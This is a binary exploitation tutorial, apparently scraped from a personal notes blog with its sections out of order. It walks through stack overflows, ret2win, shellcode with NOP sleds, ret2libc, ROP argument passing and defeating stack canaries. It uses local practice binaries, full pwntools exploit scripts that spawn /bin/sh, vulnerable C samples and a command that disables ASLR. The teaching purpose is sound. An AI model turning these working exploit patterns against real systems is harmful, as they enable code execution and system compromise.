Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Running your own code
In real exploits, it's not particularly likely that you will have a win()
function lying around - shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system.
Shellcode is essentially assembly instructions, except we input them into the binary; once we input it, we overwrite the return pointer to hijack code execution and point at our own instructions!
I promise you can trust me but you should never ever run shellcode without knowing what it does. Pwntools is safe and has almost all the shellcode you will ever need.
The reason shellcode is successful is that Von Neumann architecture (the architecture used in most computers today) does not differentiate between data and instructions - it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore, even though our input is data, the computer doesn't know that - and we can use that to our advantage.
ASLR is a security technique, and while it is not specifically designed to combat shellcode, it involves randomising certain aspects of memory (we will talk about it in much more detail later). This randomisation can make shellcode exploits like the one we're about to do more less reliable, so we'll be disabling it for now using this.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Again, you should never run commands if you don't know what they do
Let's debug vuln()
using radare2
and work out where in memory the buffer starts; this is where we want to point the return pointer to.
$ r2 -d -A vuln
[0xf7fd40b0]> s sym.unsafe ; pdf
[...]
; var int32_t var_134h @ ebp-0x134
[...]
This value that gets printed out is a local variable - due to its size, it's fairly likely to be the buffer. Let's set a breakpoint just after gets()
and find the exact address.
[0x08049172]> dc
Overflow me
<<Found me>> <== This was my input
hit breakpoint at: 80491a8
[0x080491a8]> px @ ebp - 0x134
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0xffffcfb4 3c3c 466f 756e 6420 6d65 3e3e 00d1 fcf7 <<Found me>>....
[...]
It appears to be at 0xffffcfd4
; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!).
Now we need to calculate the padding until the return pointer. We'll use the De Bruijn sequence as explained in the previous blog post.
$ ragg2 -P 400 -r
<copy this>
$ r2 -d -A vuln
[0xf7fd40b0]> dc
Overflow me
<<paste here>>
[0x73424172]> wopO `dr eip`
312
The padding is 312 bytes.
In order for the shellcode to be correct, we're going to set context.binary
to our binary; this grabs stuff like the arch, OS and bits and enables pwntools to provide us with working shellcode.
from pwn import *
context.binary = ELF('./vuln')
p = process()
Now we can use pwntools' awesome shellcode functionality to make it incredibly simple.
payload = asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode
Yup, that's it. Now let's send it off and use p.interactive()
, which enables us to communicate to the shell.
log.info(p.clean())
p.sendline(payload)
p.interactive()
If you're getting an EOFError
, print out the shellcode and try to find it in memory - the stack address may be wrong
$ python3 exploit.py
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Starting local process 'vuln': pid 3606
[*] Overflow me
[*] Switching to interactive mode
$ whoami
ironstone
$ ls
exploit.py source.c vuln
And it works! Awesome.
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode
log.info(p.clean())
p.sendline(payload)
p.interactive()
We injected shellcode, a series of assembly instructions, when prompted for input
We then hijacked code execution by overwriting the saved return pointer on the stack and modified it to point to our shellcode
Once the return pointer got popped into EIP, it pointed at our shellcode
This caused the program to execute our instructions, giving us (in this case) a shell for arbitrary command execution
The defence against shellcode
As you can expect, programmers were hardly pleased that people could inject their own instructions into the program. The NX bit, which stands for No eXecute, defines areas of memory as either instructions or data. This means that your input will be stored as data, and any attempt to run it as instructions will crash the program, effectively neutralising shellcode.
To get around NX, exploit developers have to leverage a technique called ROP, Return-Oriented Programming.
You can either use pwntools' checksec
or rabin2
.
$ checksec vuln
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
$ rabin2 -I vuln
[...]
nx false
[...]
The differences between the sizes
Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing you would need to change is switch out the p32()
for p64()
as the memory addresses are longer.
The real difference between the two, however, is the way you pass parameters to functions (which we'll be looking at much closer soon); in 32-bit, all parameters are pushed to the stack before the function is called. In 64-bit, however, the first 6 are stored in the registers RDI, RSI, RDX, RCX, R8 and R9 respectively as per the calling convention. Note that different Operating Systems also have different calling conventions.
The better way to calculate offsets
De Bruijn sequences of order n
is simply a sequence where no string of n
characters is repeated. This makes finding the offset until EIP much simpler - we can just pass in a De Bruijn sequence, get the value within EIP and find the one possible match within the sequence to calculate the offset. Let's do this on the ret2win binary.
Again, radare2
comes with a nice command-line tool (called ragg2
) that can generate it for us. Let's create a sequence of length 100
.
$ ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
The -P
specifies the length while -r
tells it to show ascii bytes rather than hex pairs.
Now we have the pattern, let's just input it in radare2
when prompted for input, make it crash and then calculate how far along the sequence the EIP is. Simples.
$ r2 -d -A vuln
[0xf7ede0b0]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 ret=0
The address it crashes on is 0x41534141
; we can use radare2
's in-built wopO
command to work out the offset.
[0x41534141]> wopO 0x41534141
52
Awesome - we get the correct value!
We can also be lazy and not copy the value.
[0x41534141]> wopO `dr eip`
52
The backticks means the dr eip
is calculated first, before the wopO
is run on the result of it.
More reliable shellcode exploits
NOP (no operation) instructions do exactly what they sound like: nothing. Which makes then very useful for shellcode exploits, because all they will do is run the next instruction. If we pad our exploits on the left with NOPs and point EIP at the middle of them, it'll simply keep doing no instructions until it reaches our actual shellcode. This allows us a greater margin of error as a shift of a few bytes forward or backwards won't really affect it, it'll just run a different number of NOP instructions - which have the same end result of running the shellcode. This padding with NOPs is often called a NOP slide or NOP sled, since the EIP is essentially sliding down them.
In intel x86 assembly, NOP instructions are \x90
.
We can make slight changes to our exploit to do two things:
Add a large number of NOPs on the left
Adjust our return pointer to point at the middle of the NOPs rather than the buffer start
Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust your previous exploit as the buffer location my be different.
It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive unexpected errors padding with NOPs but the shellcode worked before, try reducing the length of the nopsled as it may be tampering with other things on the stack
Note that NOPs are only \x90
in certain architectures, and if you need others you can use pwntools:
Welcome to my blog! There's a lot here and it's a bit spread out, so here's a guide:
If you're looking for the binary exploitation notes, you're in the right place! Here I make notes on most of the things I learn, and also provide vulnerable binaries to allow you to have a go yourself. Most "common" stack techniques are mentioned along with some super introductory heap; more will come soonâ„¢.
If you're looking for my maths notes, they are split up (with some overlap):
Cryptography-specific maths can be found on GitBook , or by clicking the hyperlink in the header
All my other maths notes can be found on Notion . I realise having it in multiple locations is annoying, but maths support in Notion is just wayyy better. Like so much better. Sorry.
Hopefully these two get moulded into one soon
If you'd like to find me elsewhere, I'm usually down as ir0nstone. The accounts you'd actually be interested in seeing are likely or my (or X, if you really prefer).
If this resource has been helpful to you, please consider :)
And, of course, thanks to GitBook for all of their support :)
~ Andrej Ljubic
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = b'\x90' * 240 # The NOPs
payload += asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4 + 120) # Address of the buffer + half nop length
log.info(p.clean())
p.sendline(payload)
p.interactive()
nop = asm(shellcraft.nop())
An introduction to binary exploitation
Binary Exploitation is about finding vulnerabilities in programs and utilising them to do what you wish. Sometimes this can result in an authentication bypass or the leaking of classified information, but occasionally (if you're lucky) it can also result in Remote Code Execution (RCE). The most basic forms of binary exploitation occur on the stack, a region of memory that stores temporary variables created by functions in code.
When a new function is called, a memory address in the calling function is pushed to the stack - this way, the program knows where to return to once the called function finishes execution. Let's look at a basic binary to show this.
The binary has two files - source.c
and vuln
; the latter is an ELF
file, which is the executable format for Linux (it is recommended to follow along with this with a Virtual Machine of your own, preferably Linux).
We're gonna use a tool called radare2
to analyse the behaviour of the binary when functions are called.
$ r2 -d -A vuln
The -d
runs it while the -A
performs analysis. We can disassemble main
with
s main; pdf
s main
seeks (moves) to main, while pdf
stands for Print Disassembly Function (literally just disassembles it).
0x080491ab 55 push ebp
0x080491ac 89e5 mov ebp, esp
0x080491ae 83e4f0 and esp, 0xfffffff0
0x080491b1 e80d000000 call sym.__x86.get_pc_thunk.ax
0x080491b6 054a2e0000 add eax, 0x2e4a
0x080491bb e8b2ffffff call sym.unsafe
0x080491c0 90 nop
0x080491c1 c9 leave
0x080491c2 c3 ret
The call to unsafe
is at 0x080491bb
, so let's break there.
db 0x080491bb
db
stands for debug breakpoint, and just sets a breakpoint. A breakpoint is simply somewhere which, when reached, pauses the program for you to run other commands. Now we run dc
for debug continue; this just carries on running the file.
It should break before unsafe
is called; let's analyse the top of the stack now:
[0x08049172]> pxw @ esp
0xff984af0 0xf7efe000 [...]
pxw
tells r2 to analyse the hex as words, that is, 32-bit values. I only show the first value here, which is 0xf7efe000
. This value is stored at the top of the stack, as ESP points to the top of the stack - in this case, that is 0xff984af0
.
Let's move one more instruction with ds
, debug step, and check the stack again. This will execute the call sym.unsafe
instruction.
[0x08049172]> pxw @ esp
0xff984aec 0x080491c0 0xf7efe000 [...]
Huh, something's been pushed onto the top of the stack - the value 0x080491c0
. This looks like it's in the binary - but where? Let's look back at the disassembly from before:
[...]
0x080491b6 054a2e0000 add eax, 0x2e4a
0x080491bb e8b2ffffff call sym.unsafe
0x080491c0 90 nop
[...]
We can see that 0x080491c0
is the memory address of the instruction after the call to unsafe
. Why? This is how the program knows where to return to after unsafe()
has finished.
But as we're interested in binary exploitation, let's see how we can possibly break this. First, let's disassemble unsafe
and break on the ret
instruction; ret
is the equivalent of pop eip
, which will get the saved return pointer we just analysed on the stack into the eip
register. Then let's continue and spam a bunch of characters into the input and see how that could affect it.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
Overflow me
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Now let's read the value at the location the return pointer was at previously, which as we saw was 0xff984aec
.
[0x080491aa]> pxw @ 0xff984aec
0xff984aec 0x41414141 0x41414141 0x41414141 0x41414141 AAAAAAAAAAAAAAAA
Huh?
It's quite simple - we inputted more data than the program expected, which resulted in us overwriting more of the stack than the developer expected. The saved return pointer is also on the stack, meaning we managed to overwrite it. As a result, on the ret
, the value popped into eip
won't be in the previous function but rather 0x41414141
. Let's check with ds
.
[0x080491aa]> ds
[0x41414141]>
And look at the new prompt - 0x41414141
. Let's run dr eip
to make sure that's the value in eip
:
[0x41414141]> dr eip
0x41414141
Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes when we let it run with dc
.
[0x41414141]> dc
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0
radare2
is very useful and prints out the address that causes it to crash. If you cause the program to crash outside of a debugger, it will usually say Segmentation Fault
, which could mean a variety of things, but usually that you have overwritten EIP.
When a function calls another function, it
pushes a return pointer to the stack so the called function knows where to return
when the called function finishes execution, it pops it off the stack again
Because this value is saved on the stack, just like our local variables, if we write more characters than the program expects, we can overwrite the value and redirect code execution to wherever we wish. Functions such as fgets()
can prevent such easy overflow, but you should check how much is actually being read.
The most basic binexp challenge
A ret2win is simply a binary where there is a win()
function (or equivalent); once you successfully redirect execution there, you complete the challenge.
To carry this out, we have to leverage what we learnt in the introduction, but in a predictable manner - we have to overwrite EIP, but to a specific value of our choice.
To do this, what do we need to know? Well, a couple things:
The padding until we begin to overwrite the return pointer (EIP)
What value we want to overwrite EIP to
When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped into EIP. The EIP register is not located on the stack, so it is not overwritten directly.
This can be found using simple trial and error; if we send a variable numbers of characters, we can use the Segmentation Fault
message, in combination with radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute force (we'll cover this in the next post), but it'll do for now.
We get an offset of 52 bytes.
Now we need to find the address of the flag()
function in the binary. This is simple.
$ r2 -d -A vuln
$ afl
[...]
0x080491c3 1 43 sym.flag
[...]
The flag()
function is at 0x080491c3
.
The final piece of the puzzle is to work out how we can send the address we want. If you think back to the introduction, the A
s that we sent became 0x41
- which is the ASCII code of A
. So the solution is simple - let's just find the characters with ascii codes 0x08
, 0x04
, 0x91
and 0xc3
.
This is a lot simpler than you might think, because we can specify them in python as hex:
address = '\x08\x04\x91\xc3'
And that makes it much easier.
Now we know the padding and the value, let's exploit the binary! We can use pwntools
to interface with the binary (check out the pwntools posts for a more in-depth look).
from pwn import * # This is how we import pwntools
p = process('./vuln') # We're starting a new process
payload = 'A' * 52
payload += '\x08\x04\x91\xc3'
p.clean() # Receive all the text
p.sendline(payload)
log.info(p.clean()) # Output the "Exploited!" string to know we succeeded
If you run this, there is one small problem: it won't work. Why? Let's check with a debugger. We'll put in a pause()
to give us time to attach radare2
onto the process.
from pwn import *
p = process('./vuln')
payload = b'A' * 52
payload += '\x08\x04\x91\xc3'
log.info(p.clean())
pause() # add this in
p.sendline(payload)
log.info(p.clean())
Now let's run the script with python3 exploit.py
and then open up a new terminal window.
r2 -d -A $(pidof vuln)
By providing the PID of the process, radare2 hooks onto it. Let's break at the return of unsafe()
and read the value of the return pointer.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
<< press any button on the exploit terminal window >>
hit breakpoint at: 80491aa
[0x080491aa]> pxw @ esp
0xffdb0f7c 0xc3910408 [...]
[...]
0xc3910408
- look familiar? It's the address we were trying to send over, except the bytes have been reversed, and the reason for this reversal is endianness. Big-endian systems store the most significant byte (the byte with the largest value) at the smallest memory address, and this is how we sent them. Little-endian does the opposite (for a reason), and most binaries you will come across are little-endian. As far as we're concerned, the byte are stored in reverse order in little-endian executables.
radare2
comes with a nice tool called rabin2
for binary analysis:
$ rabin2 -I vuln
[...]
endian little
[...]
So our binary is little-endian.
The fix is simple - reverse the address (you can also remove the pause()
)
payload += '\x08\x04\x91\xc3'[::-1]
If you run this now, it will work:
$ python3 tutorial.py
[+] Starting local process './vuln': pid 2290
[*] Overflow me
[*] Exploited!!!!!
And wham, you've called the flag()
function! Congrats!
Unsurprisingly, you're not the first person to have thought "could they possibly make endianness simpler" - luckily, pwntools has a built-in p32()
function ready for use!
payload += '\x08\x04\x91\xc3'[::-1]
becomes
payload += p32(0x080491c3)
Much simpler, right?
The only caveat is that it returns bytes
rather than a string, so you have to make the padding a byte string:
payload = b'A' * 52 # Notice the "b"
Otherwise you will get a
TypeError: can only concatenate str (not "bytes") to str
from pwn import * # This is how we import pwntools
p = process('./vuln') # We're starting a new process
payload = b'A' * 52
payload += p32(0x080491c3) # Use pwntools to pack it
log.info(p.clean()) # Receive all the text
p.sendline(payload)
log.info(p.clean()) # Output the "Exploited!" string to know we succeeded
A minor issue
A small issue you may get when pwning on 64-bit systems is that your exploit works perfectly locally but fails remotely - or even fails when you try to use the provided LIBC version rather than your local one. This arises due to something called stack alignment.
Essentially the . LIBC takes advantage of this and uses to optimise execution; system
in particular utilises instructions such as movaps
.
That means that if the stack is not 16-byte aligned - that is, RSP is not a multiple of 16 - the ROP chain will fail on system
.
The fix is simple - in your ROP chain, before the call to system
, place a singular ret
gadget:
This works because it will cause RSP to be popped an additional time, pushing it forward by 8 bytes and aligning it.
The standard ROP exploit
A ret2libc is based off the system
function found within the C library. This function executes anything passed to it making it the best target. Another thing found within libc is the string /bin/sh
; if you pass this string to system
, it will pop a shell.
And that is the entire basis of it - passing /bin/sh
as a parameter to system
. Doesn't sound too bad, right?
To start with, we are going to disable ASLR. ASLR randomises the location of libc in memory, meaning we cannot (without other steps) work out the location of system
and /bin/sh
. To understand the general theory, we will start with it disabled.
Fortunately Linux has a command called ldd
for dynamic linking. If we run it on our compiled ELF file, it'll tell us the libraries it uses and their base addresses.
We need libc.so.6
, so the base address of libc is 0xf7dc2000
.
To call system, we obviously need its location in memory. We can use the readelf
command for this.
The -s
flag tells readelf
to search for symbols, for example functions. Here we can find the offset of system from libc base is 0x44f00
.
Since /bin/sh
is just a string, we can use strings
on the dynamic library we just found with ldd
. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.
-a
tells it to scan the entire file; -t x
tells it to output the offset in hex.
Repeat the process with the libc
linked to the 64-bit exploit (should be called something like /lib/x86_64-linux-gnu/libc.so.6
).
Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret
gadget to put it into the RDI register.
Unsurprisingly, pwntools has a bunch of features that make this much simpler.
The 64-bit looks essentially the same.
ret = elf.address + 0x2439
[...]
rop.raw(POP_RDI)
rop.raw(0x4) # first parameter
rop.raw(ret) # align the stack
rop.raw(system)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ ldd vuln-32
linux-gate.so.1 (0xf7fd2000)
libc.so.6 => /lib32/libc.so.6 (0xf7dc2000)
/lib/ld-linux.so.2 (0xf7fd3000)
$ readelf -s /lib32/libc.so.6 | grep system
1534: 00044f00 55 FUNC WEAK DEFAULT 14 system@@GLIBC_2.0
$ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
18c32b /bin/sh
from pwn import *
p = process('./vuln-32')
libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b
payload = b'A' * 76 # The padding
payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get the shell
payload += p32(binsh) # pointer to command: /bin/sh
p.clean()
p.sendline(payload)
p.interactive()
$ ROPgadget --binary vuln-64 | grep rdi
[...]
0x00000000004011cb : pop rdi ; ret
from pwn import *
p = process('./vuln-64')
libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143
POP_RDI = 0x4011cb
payload = b'A' * 72 # The padding
payload += p64(POP_RDI) # gadget -> pop rdi; ret
payload += p64(binsh) # pointer to command: /bin/sh
payload += p64(system) # Location of system
payload += p64(0x0) # return pointer - not important once we get the shell
p.clean()
p.sendline(payload)
p.interactive()
# 32-bit
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
libc = elf.libc # Simply grab the libc it's running with
libc.address = 0xf7dc2000 # Set base address
system = libc.sym['system'] # Grab location of system
binsh = next(libc.search(b'/bin/sh')) # grab string location
payload = b'A' * 76 # The padding
payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get the shell
payload += p32(binsh) # pointer to command: /bin/sh
p.clean()
p.sendline(payload)
p.interactive()
The Buffer Overflow defence
Stack Canaries are very simple - at the beginning of the function, a random value is placed on the stack. Before the program executes ret
, the current value of that variable is compared to the initial: if they are the same, no buffer overflow has occurred.
If they are not, the attacker attempted to overflow to control the return pointer and the program crashes, often with a ***stack smashing detected***
error message.
There are two ways to bypass a canary.
This is quite broad and will differ from binary to binary, but the main aim is to read the value. The simplest option is using format string if it is present - the canary, like other local variables, is on the stack, so if we can leak values off the stack it's easy.
#include <stdio.h>
void vuln() {
char buffer[64];
puts("Leak me");
gets(buffer);
printf(buffer);
puts("");
puts("Overflow me");
gets(buffer);
}
int main() {
vuln();
}
void win() {
puts("You won!");
}
The source is very simple - it gives you a format string vulnerability, then a buffer overflow vulnerability. The format string we can use to leak the canary value, then we can use that value to overwrite the canary with itself. This way, we can overflow past the canary but not trigger the check as its value remains constant. And of course, we just have to run win()
.
First let's check there is a canary:
$ pwn checksec vuln-32
[*] 'vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Yup, there is. Now we need to calculate at what offset the canary is at, and to do this we'll use radare2.
$ r2 -d -A vuln-32
[0xf7f2e0b0]> db 0x080491d7
[0xf7f2e0b0]> dc
Leak me
%p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
0xffd7cd60 0xffd7cd7c 0xffd7cdec 0x00000002 0x0804919e |...............
0xffd7cd70 0x08048034 0x00000000 0xf7f57000 0x00007025 4........p..%p..
0xffd7cd80 0x00000000 0x00000000 0x08048034 0xf7f02a28 ........4...(*..
0xffd7cd90 0xf7f01000 0xf7f3e080 0x00000000 0xf7d53ade .............:..
0xffd7cda0 0xf7f013fc 0xffffffff 0x00000000 0x080492cb ................
0xffd7cdb0 0x00000001 0xffd7ce84 0xffd7ce8c 0xadc70e00 ................
The last value there is the canary. We can tell because it's roughly 64 bytes after the "buffer start", which should be close to the end of the buffer. Additionally, it ends in 00
and looks very random, unlike the libc and stack addresses that start with f7
and ff
. If we count the number of address it's around 24 until that value, so we go one before and one after as well to make sure.
$./vuln-32
Leak me
%23$p %24$p %25$p
0xa4a50300 0xf7fae080 (nil)
It appears to be at %23$p
. Remember, stack canaries are randomised for each new process, so it won't be the same.
Now let's just automate grabbing the canary with pwntools:
from pwn import *
p = process('./vuln-32')
log.info(p.clean())
p.sendline('%23$p')
canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')
$ python3 exploit.py
[+] Starting local process './vuln-32': pid 14019
[*] b'Leak me\n'
[+] Canary: 0xcc987300
Now all that's left is work out what the offset is until the canary, and then the offset from after the canary to the return pointer.
$ r2 -d -A vuln-32
[0xf7fbb0b0]> db 0x080491d7
[0xf7fbb0b0]> dc
Leak me
%23$p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
[...]
0xffea8af0 0x00000001 0xffea8bc4 0xffea8bcc 0xe1f91c00
We see the canary is at 0xffea8afc
. A little later on the return pointer (we assume) is at 0xffea8b0c
. Let's break just after the next gets()
and check what value we overwrite it with (we'll use a De Bruijn pattern).
[0x080491d7]> db 0x0804920f
[0x080491d7]> dc
0xe1f91c00
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
hit breakpoint at: 804920f
[0x0804920f]> pxw @ 0xffea8afc
0xffea8afc 0x41574141 0x41415841 0x5a414159 0x41614141 AAWAAXAAYAAZAAaA
0xffea8b0c 0x41416241 0x64414163 0x41654141 0x41416641 AbAAcAAdAAeAAfAA
Now we can check the canary and EIP offsets:
[0x0804920f]> wopO 0x41574141
64
[0x0804920f]> wopO 0x41416241
80
Return pointer is 16 bytes after the canary start, so 12 bytes after the canary.
from pwn import *
p = process('./vuln-32')
log.info(p.clean())
p.sendline('%23$p')
canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')
payload = b'A' * 64
payload += p32(canary) # overwrite canary with original value to not trigger
payload += b'A' * 12 # pad to return pointer
payload += p32(0x08049245)
p.clean()
p.sendline(payload)
print(p.clean().decode('latin-1'))
Same source, same approach, just 64-bit. Try it yourself before checking the solution.
This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-bit.
As you can expect, the general idea is to run the process loads and load of times with random canary values until you get a hit, which you can differentiate by the presence of a known plaintext, e.g. flag{
and this can take ages to run and is frankly not a particularly interesting challenge.
Bypassing NX
The basis of ROP is chaining together small chunks of code already present within the binary itself in such a way to do what you wish. This often involves passing parameters to functions already present within libc
, such as system
- if you can find the location of a command, such as cat flag.txt
, and then pass it as a parameter to system
, it will execute that command and return the output. A more dangerous command is /bin/sh
, which when run by system
gives the attacker a shell much like the shellcode we used did.
Doing this, however, is not as simple as it may seem at first. To be able to properly call functions, we first have to understand how to pass parameters to them.
A more in-depth look into parameters for 32-bit and 64-bit programs
Let's have a quick look at the source:
#include <stdio.h>
void vuln(int check) {
if(check == 0xdeadbeef) {
puts("Nice!");
} else {
puts("Not nice!");
}
}
int main() {
vuln(0xdeadbeef);
vuln(0xdeadc0de);
}
Pretty simple.
If we run the 32-bit and 64-bit versions, we get the same output:
Nice!
Not nice!
Just what we expected.
Let's open the binary up in radare2 and disassemble it.
$ r2 -d -A vuln-32
$ s main; pdf
0x080491ac 8d4c2404 lea ecx, [argv]
0x080491b0 83e4f0 and esp, 0xfffffff0
0x080491b3 ff71fc push dword [ecx - 4]
0x080491b6 55 push ebp
0x080491b7 89e5 mov ebp, esp
0x080491b9 51 push ecx
0x080491ba 83ec04 sub esp, 4
0x080491bd e832000000 call sym.__x86.get_pc_thunk.ax
0x080491c2 053e2e0000 add eax, 0x2e3e
0x080491c7 83ec0c sub esp, 0xc
0x080491ca 68efbeadde push 0xdeadbeef
0x080491cf e88effffff call sym.vuln
0x080491d4 83c410 add esp, 0x10
0x080491d7 83ec0c sub esp, 0xc
0x080491da 68dec0adde push 0xdeadc0de
0x080491df e87effffff call sym.vuln
0x080491e4 83c410 add esp, 0x10
0x080491e7 b800000000 mov eax, 0
0x080491ec 8b4dfc mov ecx, dword [var_4h]
0x080491ef c9 leave
0x080491f0 8d61fc lea esp, [ecx - 4]
0x080491f3 c3 ret
If we look closely at the calls to sym.vuln
, we see a pattern:
push 0xdeadbeef
call sym.vuln
[...]
push 0xdeadc0de
call sym.vuln
We literally push
the parameter to the stack before calling the function. Let's break on sym.vuln
.
[0x080491ac]> db sym.vuln
[0x080491ac]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffdeb54c 0x080491d4 0xdeadbeef 0xffdeb624 0xffdeb62c
The first value there is the return pointer that we talked about before - the second, however, is the parameter. This makes sense because the return pointer gets pushed during the call
, so it should be at the top of the stack. Now let's disassemble sym.vuln
.
┌ 74: sym.vuln (int32_t arg_8h);
│ ; var int32_t var_4h @ ebp-0x4
│ ; arg int32_t arg_8h @ ebp+0x8
│ 0x08049162 b 55 push ebp
│ 0x08049163 89e5 mov ebp, esp
│ 0x08049165 53 push ebx
│ 0x08049166 83ec04 sub esp, 4
│ 0x08049169 e886000000 call sym.__x86.get_pc_thunk.ax
│ 0x0804916e 05922e0000 add eax, 0x2e92
│ 0x08049173 817d08efbead. cmp dword [arg_8h], 0xdeadbeef
│ ┌─< 0x0804917a 7516 jne 0x8049192
│ │ 0x0804917c 83ec0c sub esp, 0xc
│ │ 0x0804917f 8d9008e0ffff lea edx, [eax - 0x1ff8]
│ │ 0x08049185 52 push edx
│ │ 0x08049186 89c3 mov ebx, eax
│ │ 0x08049188 e8a3feffff call sym.imp.puts ; int puts(const char *s)
│ │ 0x0804918d 83c410 add esp, 0x10
│ ┌──< 0x08049190 eb14 jmp 0x80491a6
│ │└─> 0x08049192 83ec0c sub esp, 0xc
│ │ 0x08049195 8d900ee0ffff lea edx, [eax - 0x1ff2]
│ │ 0x0804919b 52 push edx
│ │ 0x0804919c 89c3 mov ebx, eax
│ │ 0x0804919e e88dfeffff call sym.imp.puts ; int puts(const char *s)
│ │ 0x080491a3 83c410 add esp, 0x10
│ │ ; CODE XREF from sym.vuln @ 0x8049190
│ └──> 0x080491a6 90 nop
│ 0x080491a7 8b5dfc mov ebx, dword [var_4h]
│ 0x080491aa c9 leave
â”” 0x080491ab c3 ret
Here I'm showing the full output of the command because a lot of it is relevant. radare2
does a great job of detecting local variables - as you can see at the top, there is one called arg_8h
. Later this same one is compared to 0xdeadbeef
:
cmp dword [arg_8h], 0xdeadbeef
Clearly that's our parameter.
So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like:
return address param_1
Let's disassemble main
again here.
0x00401153 55 push rbp
0x00401154 4889e5 mov rbp, rsp
0x00401157 bfefbeadde mov edi, 0xdeadbeef
0x0040115c e8c1ffffff call sym.vuln
0x00401161 bfdec0adde mov edi, 0xdeadc0de
0x00401166 e8b7ffffff call sym.vuln
0x0040116b b800000000 mov eax, 0
0x00401170 5d pop rbp
0x00401171 c3 ret
Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi
(in the disassembly here it's edi
, but edi
is just the lower 32 bits of rdi
, and the parameter is only 32 bits long, so it says EDI
instead). If we break on sym.vuln
again we can check rdi
with the command
dr rdi
[0x00401153]> db sym.vuln
[0x00401153]> dc
hit breakpoint at: 401122
[0x00401122]> dr rdi
0xdeadbeef
Awesome.
#include <stdio.h>
void vuln(int check, int check2, int check3) {
if(check == 0xdeadbeef && check2 == 0xdeadc0de && check3 == 0xc0ded00d) {
puts("Nice!");
} else {
puts("Not nice!");
}
}
int main() {
vuln(0xdeadbeef, 0xdeadc0de, 0xc0ded00d);
vuln(0xdeadc0de, 0x12345678, 0xabcdef10);
}
We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.
0x080491dd 680dd0dec0 push 0xc0ded00d
